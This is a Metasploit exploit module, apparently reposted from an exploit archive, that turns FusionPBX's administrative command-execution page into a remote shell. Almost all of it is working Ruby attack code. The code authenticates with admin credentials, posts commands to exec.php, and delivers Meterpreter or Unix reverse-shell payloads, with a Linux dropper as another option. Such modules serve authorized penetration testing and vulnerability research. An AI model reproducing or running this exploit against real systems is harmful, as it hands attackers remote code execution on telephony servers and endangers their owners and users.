This Metasploit module uses administrative functionality available in FusionPBX to gain a shell. The Command section of the application permits users with exec_view permissions, or superadmin permissions, to execute arbitrary system commands, or arbitrary PHP code, as the web server user. This module has been tested successfully on FusionPBX version 4.4.1 on Ubuntu 19.04 (x64).
9ddc511633ca4524be66e468aa2349e7ebf43ba65883baed79761e3c37b3b7af
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'FusionPBX Command exec.php Command Execution',
'Description' => %q{
This module uses administrative functionality available in FusionPBX
to gain a shell.
The Command section of the application permits users with `exec_view`
permissions, or superadmin permissions, to execute arbitrary system
commands, or arbitrary PHP code, as the web server user.
This module has been tested successfully on FusionPBX version
4.4.1 on Ubuntu 19.04 (x64).
},
'License' => MSF_LICENSE,
'Author' => ['bcoles'],
'References' =>
[
['URL', 'https://docs.fusionpbx.com/en/latest/advanced/command.html']
],
'Platform' => %w[php linux unix],
'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets' =>
[
['Automatic (PHP In-Memory)',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'},
'Type' => :php_memory
],
['Automatic (Unix In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
'Type' => :unix_memory
],
['Automatic (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
'Type' => :linux_dropper
]
],
'Privileged' => false,
'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
'DisclosureDate' => '2019-11-02',
'DefaultTarget' => 0))
register_options [
OptString.new('TARGETURI', [true, 'The base path to FusionPBX', '/']),
OptString.new('USERNAME', [true, 'The username for FusionPBX', 'admin']),
OptString.new('PASSWORD', [true, 'The password for FusionPBX'])
]
end
def login(user, pass)
vprint_status "Authenticating as user '#{user}'"
vars_post = {
username: user,
password: pass,
path: ''
}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'core/user_settings/user_dashboard.php'),
'vars_post' => vars_post
})
unless res
fail_with Failure::Unreachable, 'Connection failed'
end
if res.code == 302 && res.headers['location'].include?('login.php')
fail_with Failure::NoAccess, "Login failed for user '#{user}'"
end
unless res.code == 200
fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
end
cookie = res.get_cookies.to_s.scan(/PHPSESSID=(.+?);/).flatten.first
unless cookie
fail_with Failure::UnexpectedReply, 'Failed to retrieve PHPSESSID cookie'
end
print_good "Authenticated as user '#{user}'"
cookie
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.body.include?('FusionPBX')
return CheckCode::Detected
end
CheckCode::Safe
end
def execute_command(cmd, opts = {})
vars_post = {
handler: 'php',
table_name: '',
sql_type: '',
id: '',
cmd: cmd
}
case opts[:handler]
when 'php'
vars_post[:handler] = 'php'
when 'shell'
vars_post[:handler] = 'shell'
when 'switch'
vars_post[:handler] = 'switch'
vars_post[:cmd] = "bg_system #{cmd}"
else
vars_post[:handler] = 'shell'
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'app/exec/exec.php'),
'cookie' => "PHPSESSID=#{@cookie}",
'vars_post' => vars_post
}, 5)
unless res
return if session_created?
fail_with Failure::Unreachable, 'Connection failed'
end
unless res.code == 200
fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
end
if res.body.include? 'access denied'
fail_with Failure::NoAccess, "User #{datastore['USERNAME']} does not have permission to execute #{vars_post[:handler]} #{vars_post[:handler].eql?('php') ? 'code' : 'commands'}"
end
res
end
def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
end
@cookie = login(datastore['USERNAME'], datastore['PASSWORD'])
print_status "Sending payload (#{payload.encoded.length} bytes) ..."
case target['Type']
when :php_memory
execute_command(payload.encoded, handler: 'php')
when :unix_memory
execute_command(payload.encoded, handler: 'shell')
when :linux_dropper
execute_cmdstager(:linemax => 1_500, handler: 'shell')
end
end
end